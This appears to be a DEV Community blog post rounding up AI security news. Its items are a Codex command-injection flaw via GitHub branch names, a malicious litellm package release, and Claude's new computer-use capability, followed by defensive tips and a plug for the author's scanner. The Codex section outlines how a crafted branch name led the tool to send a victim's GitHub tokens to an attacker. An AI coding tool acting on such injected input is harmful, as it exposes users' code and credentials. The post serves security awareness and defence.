DEV Community

Not Elon
Not Elon

Posted on

This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control

This was the week AI security stopped being theoretical.

Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.

1. OpenAI Codex: Command Injection via Branch Names

BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.

The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.

The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.

OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.

Every AI coding tool that touches git has this same attack surface. Basically nobody is auditing for it.

2. LiteLLM Supply Chain Attack: 47K Downloads in 46 Minutes

On March 24, 2026, litellm version 1.82.8 was published to PyPI with a malicious .pth file that executed automatically on every Python process startup.

The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.

The timeline:

  • 13 minutes between the compromised publish and detection
  • 47,000 downloads before the package was pulled
  • 95 million monthly downloads for the litellm package overall

This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you were exposed.

Endor Labs just published their analysis showing this is the same attacker behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.

3. Claude Gets Computer Use: The Closed Loop

Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.

The capability is impressive. The security implications are sobering.

With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:

  • Auth middleware actually works
  • API keys are properly scoped
  • Rate limiting is real
  • Environment variables aren't hardcoded
  • The dependencies being installed are legitimate

This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."

The Pattern

All three events share a common thread: trust boundaries in AI development are poorly defined.

  • Codex trusted user-supplied branch names as safe input
  • Vibe coders trusted pip install litellm as a safe operation
  • Claude Computer Use trusts that the code it wrote is correct because the UI loaded

Meanwhile, 9to5Mac reports that vibe coding has broken Apple's App Store review queue. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.

What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.

What You Can Do Today

If you're shipping vibe-coded apps:

  1. Pin your dependencies. Use lockfiles. Verify hashes. Don't pip install without knowing exactly what version you're getting.

  2. Treat AI-generated code as untrusted input. Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.

  3. Scan before shipping. Tools like VibeCheck scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.

  4. Assume your secrets are exposed. If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.

  5. Add rate limiting to every public endpoint. The bots are faster than your users.

The AI coding revolution is real. The security crisis is also real. They're the same thing.


I track vibe coding security tools and incidents at notelon.ai. Free scanner, no signup required.

Top comments (0)